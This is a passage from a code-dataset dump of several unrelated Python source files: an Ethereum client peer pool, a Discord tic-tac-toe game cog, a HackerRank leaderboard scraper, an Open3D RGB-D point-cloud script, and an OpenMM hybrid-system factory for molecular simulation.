PEER_CONNECT_INTERVAL,\n capacity=MAX_SEQUENTIAL_PEER_CONNECT,\n )\n\n # We set this to 0 so that upon startup (when our RoutingTable will have only a few\n # entries) we use the less restrictive filter function and get as many connection\n # candidates as possible.\n last_candidates_count = 0\n while self.is_operational:\n if self.is_full:\n await self.sleep(PEER_CONNECT_INTERVAL)\n continue\n\n await self.wait(rate_limiter.take())\n\n if last_candidates_count >= self.available_slots:\n head = await self.get_chain_head()\n genesis_hash = await self.get_genesis_hash()\n fork_blocks = extract_fork_blocks(self.vm_configuration)\n should_skip = functools.partial(\n skip_candidate_if_on_list_or_fork_mismatch,\n genesis_hash,\n head.block_number,\n fork_blocks,\n )\n else:\n self.logger.debug(\n \"Didn't get enough candidates last time, falling back to skipping \"\n \"only peers that are blacklisted or already connected to\")\n should_skip = skip_candidate_if_on_list # type: ignore\n\n try:\n candidate_counts = await asyncio.gather(*(\n self._add_peers_from_backend(backend, should_skip)\n for backend in self.peer_backends\n ))\n last_candidates_count = sum(candidate_counts)\n except OperationCancelled:\n break\n except asyncio.CancelledError:\n # no need to log this exception, this is expected\n raise\n except Exception:\n self.logger.exception(\"unexpected error during peer connection\")\n # Continue trying to connect to peers, even if there was a\n # surprising failure during one of the attempts.\n continue\n\n @property\n def vm_configuration(self) -> Tuple[Tuple[BlockNumber, Type[VirtualMachineAPI]], ...]:\n return self.context.vm_configuration\n\n async def get_chain_head(self) -> BlockHeader:\n return await self.wait(self.context.headerdb.coro_get_canonical_head())\n\n async def get_genesis_hash(self) -> Hash32:\n return await self.wait(\n self.context.headerdb.coro_get_canonical_block_hash(BlockNumber(GENESIS_BLOCK_NUMBER))\n )\n\n @property\n def highest_td_peer(self) -> BaseChainPeer:\n peers = tuple(self.connected_nodes.values())\n if not peers:\n raise NoConnectedPeers(\"No connected peers\")\n\n td_getter = excepts(\n (PeerConnectionLost, UnknownAPI),\n operator.attrgetter('head_info.head_td'),\n lambda _: 0,\n )\n peers_by_td = groupby(td_getter, peers)\n max_td = max(peers_by_td.keys())\n return random.choice(peers_by_td[max_td])\n\n def get_peers(self, min_td: int) -> List[BaseChainPeer]:\n # TODO: Consider turning this into a method that returns an AsyncIterator, to make it\n # harder for callsites to get a list of peers while making blocking calls, as those peers\n # might disconnect in the meantime.\n peers = tuple(self.connected_nodes.values())\n return [peer for peer in peers if peer.head_info.head_td >= min_td]\n\n def setup_connection_tracker(self) -> BaseConnectionTracker:\n if self.has_event_bus:\n return ConnectionTrackerClient(self.get_event_bus())\n else:\n return NoopConnectionTracker()\n\n def setup_peer_backends(self) -> Tuple[BasePeerBackend, ...]:\n if self.has_event_bus:\n self.peer_tracker = EventBusEth1PeerTracker(self.get_event_bus())\n else:\n self.peer_tracker = NoopEth1PeerTracker()\n\n self.subscribe(self.peer_tracker)\n return super().setup_peer_backends() + (self.peer_tracker,)\n\n\ndef skip_candidate_if_on_list(skip_list: Container[NodeID], candidate: NodeAPI) -> bool:\n # This shouldn't happen as we don't keep ENRs with no endpoint information, but we check it\n # here just in case.\n if candidate.address is None:\n p2p_logger.warning(\"Skipping connection candidate with no endpoint info: %s\", candidate)\n return True\n if candidate.id in skip_list:\n p2p_logger.debug2(\"Skipping connection candidate (%s) as it's on skip list\", candidate)\n return True\n return False\n\n\ndef skip_candidate_if_on_list_or_fork_mismatch(\n genesis_hash: Hash32,\n head: BlockNumber,\n fork_blocks: Tuple[BlockNumber, ...],\n skip_list: Container[NodeID],\n candidate: NodeAPI) -> bool:\n if skip_candidate_if_on_list(skip_list, candidate):\n return True\n\n # For now we accept candidates which don't specify a ForkID in their ENR, but we may want to\n # change that if we realize we're getting too many chain-mismatch errors when connecting.\n try:\n candidate_forkid = extract_forkid(candidate.enr)\n except ENRMissingForkID:\n p2p_logger.debug(\"Accepting connection candidate (%s) with no ForkID\", candidate)\n return False\n except MalformedMessage as e:\n # Logging as a warning just in case there's a bug in our code that fails to deserialize\n # valid ForkIDs. If this becomes too noisy, we should consider reducing the severity.\n p2p_logger.warning(\n \"Unable to extract ForkID from ENR of %s (%s), accepting as connection candidate \"\n \"anyway\",\n candidate,\n e,\n )\n return False\n\n try:\n validate_forkid(candidate_forkid, genesis_hash, head, fork_blocks)\n except BaseForkIDValidationError as e:\n p2p_logger.debug(\"Skipping forkid-incompatible connection candidate (%s): %s\", candidate, e)\n return True\n\n p2p_logger.debug(\"Accepting forkid-compatible connection candidate (%s)\", candidate)\n return False\n","repo_name":"AYCH-Inc/aych.eth.client","sub_path":"trinity/protocol/common/peer.py","file_name":"peer.py","file_ext":"py","file_size_in_byte":10799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5090059019","text":"import re\n\nfrom discord.ext import commands\nfrom helpers.tic_tac_toe.tic_tac_toe_game import TicTacToeGame\nfrom helpers import ask_for_acceptance\n\n\nclass TicTacToe(commands.Cog):\n \"\"\"\n Play Tic-Tac-Toe against another discord user or against the computer with three difficulties:\n - easy\n - difficult\n - impossible\n \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(\n name=\"ttt\",\n help=\"\"\"\n Available difficulties:\n - easy\n - difficult\n - impossible\n \"\"\",\n aliases=[\"play_tic_tac_toe\"],\n )\n async def play_tic_tac_toe(self, ctx, difficulty: str) -> None:\n \"\"\"\n play tic tac toe game against computer\n\n :param difficulty: CPU difficulty\n :type difficulty: str\n \"\"\"\n if difficulty.lower() not in [\"easy\", \"difficult\", \"impossible\"]:\n await ctx.send(\"Unavailable difficulty\")\n return\n game = TicTacToeGame(\"X\", \"O\", TicTacToeGame.PLAYER, difficulty)\n while not game.check_game_over():\n await ctx.send(game.to_string(True))\n await ctx.send(\"Where do you want to go?\")\n move = await self.bot.wait_for(\n \"message\", check=lambda message: message.author == ctx.author\n )\n if move.content.strip().lower() == \"exit\":\n await ctx.send(\"Exiting...\")\n return\n try:\n move = int(move.content.strip().lower())\n except ValueError:\n await ctx.send(\"This doesn't look like a number\")\n continue\n if move not in game.possible_moves():\n await ctx.send(\"You can't choose field \" + str(move))\n continue\n game.make_move(move)\n if game.check_game_over():\n break\n await ctx.send(game.to_string())\n ai_move = game.get_ai_move()\n await ctx.send(\"I choose \" + str(ai_move))\n game.make_move(ai_move)\n winner = game.get_winner()\n await ctx.send(game.to_string())\n if winner == game.PLAYER:\n await ctx.send(\"You won! Congratulation!\")\n elif winner == game.COMPUTER:\n await ctx.send(\"I won! Better luck next time!\")\n else:\n await ctx.send(\"It's a Draw! Wanna play again?\")\n\n @commands.command(\n name=\"ttt_mulit\",\n help=\"\"\"\n Play Tic-Tac-Toe against someone on your discord server!\n Simply ttt_multi and mention player2\n \"\"\",\n aliases=[\"play_tic_tac_toe_multiplayer\"],\n )\n async def play_tic_tac_toe_multiplayer(self, ctx, opponent) -> None:\n \"\"\"\n play Tic-Tac-Toe against another player\n\n\n :param opponent: other player\n :type opponent: discord member\n \"\"\"\n challenger = ctx.author\n opponent = ctx.guild.get_member(int(re.sub(\"[^0-9]\", \"\", opponent)))\n invite = (\n opponent.mention\n + \"! \"\n + challenger.mention\n + \" is in inviting you to a game of Tic-Tac-Toe. Accept?\"\n )\n if await ask_for_acceptance.ask(invite, opponent, ctx.channel, self.bot):\n await ctx.send(\n \"An epic Tic-Tac-Toe Duel is about to start between \"\n + challenger.mention\n + \" and \"\n + opponent.mention\n )\n else:\n await ctx.send(\n \"Hey \"\n + challenger.mention\n + \"! I am sad to inform you \"\n + opponent.mention\n + \" hasn't accepted the invite\"\n )\n return\n active_player = opponent\n game = TicTacToeGame(\"X\", \"O\", TicTacToeGame.PLAYER, \"\")\n while not game.check_game_over():\n await ctx.send(\"It is \" + active_player.mention + \"'s turn!\")\n await ctx.send(game.to_string(including_number_grid=True))\n move = await self.bot.wait_for(\n \"message\", check=lambda message: message.author == active_player\n )\n if move.content.strip().lower() == \"exit\":\n await ctx.send(active_player.mention + \" gave up!\")\n return\n try:\n move = int(move.content.strip().lower())\n except ValueError:\n await ctx.send(\"This doesn't look like a number\")\n continue\n if move not in game.possible_moves():\n await ctx.send(\"You can't choose field \" + str(move))\n continue\n game.make_move(move)\n active_player = opponent if active_player == challenger else challenger\n winner = game.get_winner()\n await ctx.send(game.to_string())\n if winner == game.PLAYER:\n await ctx.send(opponent.mention + \" won against \" + challenger.mention)\n elif winner == game.COMPUTER:\n await ctx.send(challenger.mention + \" won against \" + opponent.mention)\n else:\n await ctx.send(\n \"It's a draw between \" + challenger.mention + \" and \" + opponent.mention\n )\n\n\ndef setup(bot):\n bot.add_cog(TicTacToe(bot))\n","repo_name":"sneks-sus/Novell","sub_path":"cogs/games/tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"27100887268","text":"import requests,math\nfrom .generic_engine import GenericEngine\nfrom .generic_driver import GenericDriver\n\n\"\"\"\nafter per the study made on the hackerrank\nscraping the hackerrank based on time is not reliable\nso college filtration in mandatory to support hacker rank adding to support for supported colleges\n\"\"\"\nclass HackerRankEngine(GenericEngine):\n def __init__(self, question_url, key_users, schools):\n super().__init__(question_url,key_users)\n self.schools = schools\n self.config = {\n \"students_per_request\":100\n }\n\n def generate_request_url(self, **kwargs):\n rest_url = self.base_url.replace(\"hackerrank.com/\", \"hackerrank.com/rest/contests/master/\")\n kwargs['school'] = kwargs['school'].replace(\" \", \"%20\")\n current_rest_url = rest_url + \"/filter?offset={off_set}&limit={limit}&&include_practice=true&filter_kinds=school&school={school}\"\n students_per_request = self.config[\"students_per_request\"]\n return current_rest_url.format(off_set=(kwargs.get('pg_id',0)*students_per_request),limit=((kwargs.get('pg_id',0)+1)*students_per_request),school=kwargs.get('school'))\n\n def get_page_data(self, url):\n while True:\n try:\n response = requests.get(url)\n except Exception as e:\n continue\n break\n data = response.json()\n return data\n\n def get_pages_count(self, page_data):\n students_per_request = self.config[\"students_per_request\"]\n return math.ceil(page_data['total'] / students_per_request)\n\n def get_users_from_page(self, page_data):\n result_li = []\n for x in page_data['models']:\n if x['score'] != 0 and x['hacker'] in self.key_users:\n result_li.append(x['hacker'])\n return result_li\n\n def update_matching_list(self, users_li):\n self.result_users.update(users_li)\n\n def scrap_the_question_for_school(self, school):\n initial_url = self.generate_request_url(school=school)\n page_data = self.get_page_data(initial_url)\n pages_count = self.get_pages_count(page_data)\n pg = 1\n while True:\n page_users = self.get_users_from_page(page_data)\n self.update_matching_list(page_users)\n if (pg >= pages_count):\n break\n url = self.generate_request_url(pg_id=pg, school=school)\n page_data = self.get_page_data(url)\n pg += 1\n\n def scrap_the_question(self,):\n for school in self.schools:\n self.scrap_the_question_for_school(school)\n return self.get_results()\n\nclass HackerRankDriver(GenericDriver):\n def __init__(self, question_url, given_users, schools):\n if schools == None:\n raise Exception(\"Hackerrank requires schools for scraping of the results\")\n leaderboard_url = question_url.replace('/problem', '/leaderboard')\n super().__init__(leaderboard_url , given_users, HackerRankEngine(leaderboard_url, given_users, schools))\n\n def get_results(self,):\n return self.engine.scrap_the_question()\n\n\ndef tester():\n question ='https://www.hackerrank.com/challenges/a-very-big-sum/problem'\n users = [\"13PA1A05A4\", \"VinayV9\"]\n hd = HackerRankDriver(question, users, ['Vishnu Institute Of Technology'])\n print(hd.get_results())\n\ntester()\n","repo_name":"saikishan/cap_report_generator","sub_path":"scraper/scraper/platforms/hackerrank.py","file_name":"hackerrank.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39168321329","text":"import cv2\r\nimport open3d as o3d\r\nimport numpy as np \r\nimport pathlib\r\n\r\n\r\n\r\ndef scale_point_cloud(pcd, scale_factor):\r\n pcd_scaled = pcd # Create a copy of the original point cloud\r\n\r\n # Scale the X, Y, and Z coordinates of each point by the scale_factor\r\n pcd_scaled.points = o3d.utility.Vector3dVector(np.asarray(pcd.points) * scale_factor)\r\n\r\n return pcd_scaled\r\n\r\ndef create_point_cloud_blender(rgb_file, depth_file, intrinsic, extrinsic):\r\n\r\n file_extension=pathlib.Path(depth_file).suffix\r\n print(file_extension)\r\n if file_extension==\".npz\":\r\n with np.load(depth_file) as depth_npz:\r\n depthimg = depth_npz['depth']\r\n \r\n else:\r\n with open(depth_file, 'rb') as f:\r\n depthimg = np.load(f)\r\n depth_map = depthimg.copy()\r\n depth_map = np.float32(depth_map)\r\n\r\n rgbImg = cv2.imread(rgb_file)\r\n rgbImg = cv2.cvtColor(rgbImg, cv2.COLOR_RGB2BGR)\r\n\r\n color_ = o3d.geometry.Image(rgbImg)\r\n depth_ = o3d.geometry.Image(depth_map)\r\n\r\n rgbd_image = o3d.geometry.RGBDImage.create_from_color_and_depth(\r\n color_, depth_, depth_scale=3.0, depth_trunc=3.00000, convert_rgb_to_intensity=False)\r\n\r\n extrinsic = np.asarray(np.loadtxt(extrinsic, dtype=np.float64))\r\n camera_intrinsic_mat = np.asarray(np.loadtxt(intrinsic, dtype=np.float64))\r\n\r\n # Convert intrinsic matrix to PinholeCameraIntrinsic\r\n intrinsic = o3d.camera.PinholeCameraIntrinsic(1280, 720, camera_intrinsic_mat[0][0], camera_intrinsic_mat[1][1], camera_intrinsic_mat[0][2], camera_intrinsic_mat[1][2])\r\n pcd = o3d.geometry.PointCloud.create_from_rgbd_image(rgbd_image, intrinsic, extrinsic)\r\n pcd.transform([[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]])\r\n\r\n R = pcd.get_rotation_matrix_from_xyz((np.pi * 0.5, np.pi * 1.5, 0))\r\n pcd = pcd.rotate(R, center=(0, 0, 0))\r\n print(camera_intrinsic_mat)\r\n\r\n # Scale the point cloud as the original\r\n scale_factor = 5.0\r\n pcd_scaled = scale_point_cloud(pcd, scale_factor)\r\n\r\n o3d.visualization.draw_geometries([pcd_scaled])\r\n return pcd\r\n\r\n\r\nrgb_file_path=\"rgb_images/rgb_0001.png\"\r\n\r\ndepth_file_path=\"depth_array_unresized_npy/depth_0001.npy\"\r\n\r\n\r\ncamera_extrinsic_path = \"living_room_folder/camera_extrinsic0.txt\"\r\ncamera_intrinsic_path = \"living_room_folder/camera_intrinsic.txt\"\r\n\r\npoint_cloud = create_point_cloud_blender(rgb_file_path, depth_file_path, camera_intrinsic_path, camera_extrinsic_path)\r\n\r\n\r\nfile_path=f\"point_cloud_depth_resized_0003.ply\"\r\no3d.io.write_point_cloud(file_path,point_cloud)","repo_name":"nileshpccoe/point_cloud_creation","sub_path":"rgbd2pcd.py","file_name":"rgbd2pcd.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29322679233","text":"import openmm\nfrom openmm import app, unit\nimport numpy as np\nimport copy\nfrom typing import Any, Tuple, Dict, Iterable, Callable\nfrom aludel.utils import maybe_params_as_unitless, sort_indices_to_str\n\n# utilities\n\ndef make_exception_param_from_particles(_force_to_query, particles):\n p1_particle_params = maybe_params_as_unitless(_force_to_query.getParticleParameters(particles[0]))\n p2_particle_params = maybe_params_as_unitless(_force_to_query.getParticleParameters(particles[1]))\n cp = p1_particle_params[0] * p2_particle_params[0]\n s = (p1_particle_params[1] + p2_particle_params[1])/2.\n e = np.sqrt(p1_particle_params[2]*p2_particle_params[2])\n return cp, s, e\n\ndef translate_standard_valence_force_to_custom(\n old_force: openmm.Force, # old valence force\n new_force: openmm.Force, # new valence force\n old_to_hybrid_map: Iterable[int],\n new_to_hybrid_map: Iterable[int],\n unique_old_atoms: Iterable[int],\n unique_new_atoms: Iterable[int],\n force_utils: Dict[str, Any],\n custom_expression: str,\n global_parameters: Dict[str, float],\n static_del: Iterable[int] = [1, 0, 0, 0, 0],\n old_del: Iterable[int] = [0, 1, 0, 0, 0],\n new_del: Iterable[int] = [0, 0, 1, 0, 0],\n unique_old_del: Iterable[int] = [0, 0, 0, 1, 0],\n unique_new_del: Iterable[int] = [0, 0, 0, 0, 1],\n **kwargs) -> openmm.Force:\n \"\"\"\n translate a standard valence force\"\"\"\n num_particles = force_utils['num_particles']\n\n # make the custom valence force and add per term params\n custom_expression = custom_expression + force_utils['U_valence']\n U_out = force_utils['custom_force'](custom_expression)\n is_periodic = old_force.usesPeriodicBoundaryConditions()\n _ = U_out.setUsesPeriodicBoundaryConditions(is_periodic)\n for gp_name, gp_val in global_parameters.items(): # add per particle params\n U_out.addGlobalParameter(gp_name, gp_val)\n\n add_per_term_param_fn = getattr(U_out, force_utils['add_per_term_param'])\n for _term in force_utils['per_term_params']:\n _ = add_per_term_param_fn(_term)\n\n # get the setTerm/addTerm/query methods\n term_adder_fn = getattr(U_out, force_utils['addTerm'])\n term_setter_fn = getattr(U_out, force_utils['setTerm'])\n query_U_out_by_idx_fn = getattr(U_out, force_utils['query_params'])\n\n hybr_idx_to_term_dict = {} # record dict of added terms\n for force in [old_force, new_force]:\n query_term_by_idx_fn = getattr(force, force_utils['query_params'])\n num_terms = getattr(force, force_utils['query_num_terms'])()\n uniques = unique_old_atoms if force == old_force else unique_new_atoms\n to_hybrid_map = old_to_hybrid_map if force == old_force else new_to_hybrid_map\n for idx in range(num_terms):\n all_params = query_term_by_idx_fn(idx) # full param spec\n orig_indices = all_params[:num_particles] # get the original indices\n hybr_indices = [to_hybrid_map[_q] for _q in orig_indices] # map to hybrid indices\n unitless_term_params = maybe_params_as_unitless(all_params[num_particles:]) # make the terms unitless\n hybr_ind_str = '.'.join([str(_q) for _q in hybr_indices]) # make hybrid indices strings\n # check if contains uniques first\n if len(set(orig_indices).intersection(uniques)) > 0:\n # unique new/old particles included\n _del = unique_old_del if force == old_force else unique_new_del\n _term_idx = term_adder_fn(*hybr_indices,\n unitless_term_params + _del)\n else: # no unique particles in this.\n if force == old_force: # iterate over this first,\n # make it old; adjust this afterward if it is\n # encountered in `force == new_force`\n _term_idx = term_adder_fn(*hybr_indices, unitless_term_params + old_del)\n try: # try to append it to the recorder dict\n hybr_idx_to_term_dict[hybr_ind_str].append(_term_idx)\n except Exception as e: # if it is not in the keys, make a new one\n hybr_idx_to_term_dict[hybr_ind_str] = [_term_idx]\n else: # force == new_force\n rev_hybr_ind_str = '.'.join([str(_q) for _q in hybr_indices[::-1]])\n try: # try to query the recorder dict\n try: # query as the str exists\n match_term_indices = hybr_idx_to_term_dict[hybr_ind_str]\n except: # query backward str\n match_term_indices = hybr_idx_to_term_dict[rev_hybr_ind_str]\n except Exception as e: # there are no match terms\n match_term_indices = []\n if len(match_term_indices) == 0:\n # this is a mapped term that is new\n _term_idx = term_adder_fn(*hybr_indices,\n unitless_term_params + new_del)\n else: # there is at least 1 idx match; now match parameters\n param_match = False\n for match_term_idx in match_term_indices: # iterate over matches\n match_params = query_U_out_by_idx_fn(match_term_idx)\n non_delimiter_match_params = match_params[-1][:-5]\n if np.allclose(list(unitless_term_params), list(non_delimiter_match_params)):\n # these terms match, and we can make them static...\n param_match = True\n break\n if param_match: # there is a term with _exact_ parameters\n term_setter_fn(match_term_idx, *hybr_indices, list(non_delimiter_match_params) + static_del)\n else: # there is no term with _exact_ parametes; add to new\n _ = term_adder_fn(*hybr_indices, unitless_term_params + new_del)\n return U_out\n\ndef translate_standard_nonbonded_force(\n old_nbf: openmm.NonbondedForce,\n new_nbf: openmm.NonbondedForce,\n num_hybrid_particles: int,\n old_to_hybrid_map: Dict[int, int],\n new_to_hybrid_map: Dict[int, int],\n unique_old_atoms: Iterable[int],\n unique_new_atoms: Iterable[int],\n unique_old_exception_switch: str,\n unique_new_exception_switch: str,\n exception_offset: str,\n particle_offset: str,\n **kwargs) -> Tuple[openmm.NonbondedForce, openmm.NonbondedForce]:\n\n # make U_static and add global parameters\n U_static = copy.deepcopy(old_nbf)\n for gp in [unique_old_exception_switch, unique_new_exception_switch]:\n U_static.addGlobalParameter(gp, 1.)\n for gp in [exception_offset, particle_offset]:\n U_static.addGlobalParameter(gp, 0.)\n num_old_particles = old_nbf.getNumParticles()\n num_new_particles = new_nbf.getNumParticles()\n assert all([key==val for key, val in old_to_hybrid_map.items()]), \\\n f\"\"\"nbf translation requirement for consistency\"\"\"\n assert num_old_particles == len(old_to_hybrid_map)\n\n hybrid_to_old_map = {val:key for key, val in old_to_hybrid_map.items()}\n hybrid_to_new_map = {val:key for key, val in new_to_hybrid_map.items()}\n\n # add extra particles\n particle_difference = num_hybrid_particles - num_old_particles\n [U_static.addParticle(0.,0.,0.) for _ in range(particle_difference)]\n\n # first thing to do is gather all of the nonbonded exceptions\n exception_data = {}\n for orig_force in [old_nbf, new_nbf]:\n exception_data[orig_force] = {}\n num_exceptions = orig_force.getNumExceptions()\n to_hybrid_map = old_to_hybrid_map if orig_force == old_nbf \\\n else new_to_hybrid_map\n for orig_exception_idx in range(num_exceptions):\n _params = orig_force.getExceptionParameters(orig_exception_idx)\n orig_indices = _params[:2]\n hybrid_indices = [to_hybrid_map[_q] for _q in orig_indices]\n sorted_hybrid_inds_str = sort_indices_to_str(hybrid_indices)\n exception_data[orig_force][sorted_hybrid_inds_str] = orig_exception_idx\n\n # now, iterate through the exceptions\n for _force in [old_nbf, new_nbf]:\n num_exceptions = _force.getNumExceptions()\n opp_force = old_nbf if _force == new_nbf else new_nbf\n to_hybrid_map = old_to_hybrid_map if _force == old_nbf \\\n else new_to_hybrid_map\n to_opposite_orig_map = hybrid_to_new_map if _force == old_nbf \\\n else hybrid_to_old_map\n opp_exc_dict_to_query = exception_data[new_nbf] if \\\n _force == old_nbf else exception_data[old_nbf]\n uniques = unique_old_atoms if _force == old_nbf \\\n else unique_new_atoms\n unique_param_offset_gp = unique_old_exception_switch \\\n if _force == old_nbf else unique_new_exception_switch\n for orig_exc_idx in range(num_exceptions):\n orig_exc_params = _force.getExceptionParameters(orig_exc_idx)\n orig_indices = orig_exc_params[:2]\n orig_nonidx_params = maybe_params_as_unitless(orig_exc_params[2:])\n hybrid_inds = [to_hybrid_map[_q] for _q in orig_indices]\n sorted_hybrid_inds_str = sort_indices_to_str(hybrid_inds)\n contains_unique = len(\n set(orig_indices).intersection(set(uniques))) > 0\n try: # get the exception from the opposite system\n opp_exc_idx = opp_exc_dict_to_query[sorted_hybrid_inds_str]\n except Exception as e: # the exception idx doesn't exist;\n opp_exc_idx = -1\n if opp_exc_idx == -1:\n # that means the particles included are unique or the\n # exception is simply not in the opposing system\n if contains_unique:\n # zero the params and make an offset for unique news\n new_exc_idx = U_static.addException(*hybrid_inds,\n 0., 0., 0., replace=True)\n new_exc_offset_idx = U_static.addExceptionParameterOffset(\n unique_param_offset_gp, new_exc_idx, *orig_nonidx_params)\n else:\n raise Exception(f\"\"\"this is not well-tested;\n reconsider your mapping, please.\"\"\")\n # the opposite params must be queried from particle params\n opp_particle_indices = [to_opposite_orig_map[_q] for\n _q in hybrid_inds]\n cp, s, e = make_exception_param_from_particles(opp_force,\n opp_particle_indices)\n _scales = [_new - _old for _old, _new in zip(orig_nonidx_params,\n [cp, s, e])]\n new_exc_offset_idx = U_static.addExceptionParameterOffset(\n exception_offset, orig_exc_idx, _scales)\n else: # this means that the exception _is_\n # mapped in the opposite system\n # only write the offset for the first iter in the for (old_nbf)\n # and if the the parameters are not the same (otherwise it would\n # be redundant.)\n opposite_parameters = maybe_params_as_unitless(\n opp_force.getExceptionParameters(opp_exc_idx)[2:])\n if _force == old_nbf and not np.allclose(\n orig_nonidx_params, opposite_parameters):\n opposite_parameters = maybe_params_as_unitless(\n opp_force.getExceptionParameters(opp_exc_idx)[2:])\n _scales = [_new - _old for _old, _new in zip(orig_nonidx_params,\n opposite_parameters)]\n new_exc_offset_idx = U_static.addExceptionParameterOffset(\n exception_offset, orig_exc_idx, *_scales)\n\n # then add exceptions between all unique new/old\n for unique_new_idx in unique_new_atoms:\n unique_new_hybr_idx = new_to_hybrid_map[unique_new_idx]\n for unique_old_idx in unique_old_atoms:\n unique_old_hybrid_idx = old_to_hybrid_map[unique_old_idx]\n _ = U_static.addException(unique_old_hybrid_idx,\n unique_new_hybr_idx, 0., 0., 0.)\n\n # exceptions are handled\n # iterate over particles...\n for old_idx, hybrid_idx in old_to_hybrid_map.items(): # redundant\n # this is redundant because of first assert statement\n old_params = old_nbf.getParticleParameters(old_idx)\n U_static.setParticleParameters(hybrid_idx, *old_params)\n if old_idx in unique_old_atoms: # create an offset\n _scales = [-1*_i for _i in maybe_params_as_unitless(old_params)]\n _ = U_static.addParticleParameterOffset(\n particle_offset, hybrid_idx, *_scales)\n try:\n new_particle_idx = hybrid_to_new_map[hybrid_idx]\n except:\n new_particle_idx = -1\n if new_particle_idx >=0: # it is mapped;\n # decide whether to add offset.\n new_params = new_nbf.getParticleParameters(new_particle_idx)\n _old_params = maybe_params_as_unitless(old_params)\n _new_params = maybe_params_as_unitless(new_params)\n _scales = [_new - _old for _old, _new in\n zip(_old_params, _new_params)]\n if not np.allclose(_old_params, _new_params):\n _ = U_static.addParticleParameterOffset(\n particle_offset, hybrid_idx, *_scales)\n else: # old params are same as new params for particle\n # we have already added the old params, so pass\n pass\n\n else:\n assert old_idx in unique_old_atoms\n\n for new_idx in unique_new_atoms:\n new_params = new_nbf.getParticleParameters(new_idx)\n hybrid_idx = new_to_hybrid_map[new_idx]\n _ = U_static.addParticleParameterOffset(\n particle_offset, hybrid_idx, *new_params)\n\n # now pull it all together\n U0_static = copy.deepcopy(U_static)\n U1_static = copy.deepcopy(U_static)\n\n for gp_idx in range(U0_static.getNumGlobalParameters()):\n gp_name = U0_static.getGlobalParameterName(gp_idx)\n gp_val = U0_static.getGlobalParameterDefaultValue(gp_idx)\n if np.isclose(gp_val, 0.): # then U1_static gets turned to 1\n U1_static.setGlobalParameterDefaultValue(gp_idx, 1.)\n U0_static.setGlobalParameterName(gp_idx, f\"U0_static_\" + gp_name)\n U1_static.setGlobalParameterName(gp_idx, f\"U1_static_\" + gp_name)\n return U0_static, U1_static\n\ndef get_hybrid_positions(old_positions: unit.Quantity,\n new_positions: unit.Quantity,\n num_hybrid_particles: int,\n old_to_hybrid_map: Dict[int, int],\n new_to_hybrid_map: Dict[int, int],\n **unused_kwargs) -> unit.Quantity:\n \"\"\"get hybrid positions from old/new positions; `openmm`-amenable;\n `mapped_positions_on_old` will write mapped positions to the old particle indices;\n otherwise, will map to new.\"\"\"\n hybrid_positions = np.zeros((num_hybrid_particles, 3))\n old_pos_sans_units = old_positions.value_in_unit_system(unit.md_unit_system)\n new_pos_sans_units = new_positions.value_in_unit_system(unit.md_unit_system)\n to_hybrid_maps = [old_to_hybrid_map, new_to_hybrid_map]\n from_position_cache = [old_pos_sans_units, new_pos_sans_units]\n\n for to_hybrid_map, from_positions in zip(to_hybrid_maps, from_position_cache):\n for orig_idx, hybrid_idx in to_hybrid_map.items():\n hybrid_positions[hybrid_idx,:] = from_positions[orig_idx,:]\n return hybrid_positions * unit.nanometers\n\ndef get_original_positions_from_hybrid(hybrid_positions: unit.Quantity,\n hybrid_to_original_map: Dict[int,int],\n **unused_kwargs):\n out_positions = np.zeros((len(hybrid_to_original_map), 3))\n hybrid_posits_sans_units = hybrid_positions/unit.nanometer\n for hybrid_idx, orig_idx in hybrid_to_original_map.items():\n out_positions[orig_idx,:] = hybrid_posits_sans_units[hybrid_idx, :]\n return out_positions*unit.nanometer\n\ndef energy_by_force(system: openmm.System,\n reference_positions: unit.Quantity,\n context_args: Tuple[Any],\n box_vectors: Tuple[unit.Quantity]=None,\n global_parameters: Dict[str, int]=None,\n forces_too: bool=False) -> Dict[str, unit.Quantity]:\n \"\"\"\n from a unique-force-style system with reference positions/box_vectors,\n iterate through each force object and return the potential energy per\n force object.\n \"\"\"\n for idx, force in enumerate(system.getForces()):\n force.setForceGroup(idx)\n\n context = openmm.Context(system, openmm.VerletIntegrator(1.), *context_args)\n if box_vectors is None:\n box_vectors = system.getDefaultPeriodicBoxVectors()\n context.setPeriodicBoxVectors(*box_vectors)\n context.setPositions(reference_positions)\n if global_parameters is not None:\n for _name, _val in global_parameters.items():\n context.setParameter(_name, _val)\n out_energies = {}\n out_forces = {}\n for idx, force in enumerate(system.getForces()):\n state = context.getState(getEnergy=True, getForces=True, groups={idx})\n _e = state.getPotentialEnergy().value_in_unit_system(unit.md_unit_system)\n _f = state.getForces(asNumpy=True).value_in_unit_system(unit.md_unit_system)\n out_energies[force] = _e\n out_forces[force] = _f\n del context\n if forces_too:\n return out_energies, out_forces\n else:\n return out_energies\n\n\ndef getParameters_to_dict(mapstringdouble):\n out_dict = {}\n for key in mapstringdouble:\n out_dict[key] = mapstringdouble[key]\n return out_dict\n\ndef setParameters(parameters, context):\n for key, val in parameters.items():\n context.setParameter(key,val)\n\n# class definition\n\nclass BaseSingleTopologyHybridSystemFactory(object):\n \"\"\"\n base class for generating a hybrid system object\n \"\"\"\n _allowed_force_names = ['HarmonicBondForce',\n 'HarmonicAngleForce', 'PeriodicTorsionForce',\n 'NonbondedForce', 'MonteCarloBarostat']\n\n def __init__(\n self: Any,\n old_system: openmm.System, # old_system\n new_system: openmm.System, # new system\n old_to_new_atom_map: Dict[int, int],\n unique_old_atoms: Iterable[int],\n unique_new_atoms: Iterable[int],\n **kwargs):\n\n self._old_system = copy.deepcopy(old_system)\n self._new_system = copy.deepcopy(new_system)\n self._old_to_new_atom_map = copy.deepcopy(old_to_new_atom_map)\n self._unique_old_atoms = copy.deepcopy(unique_old_atoms)\n self._unique_new_atoms = copy.deepcopy(unique_new_atoms)\n self._hybrid_system = openmm.System()\n\n # now call setup fns\n self._add_particles_to_hybrid(**kwargs)\n self._get_force_dicts(**kwargs) # render force dicts for new/old sys\n 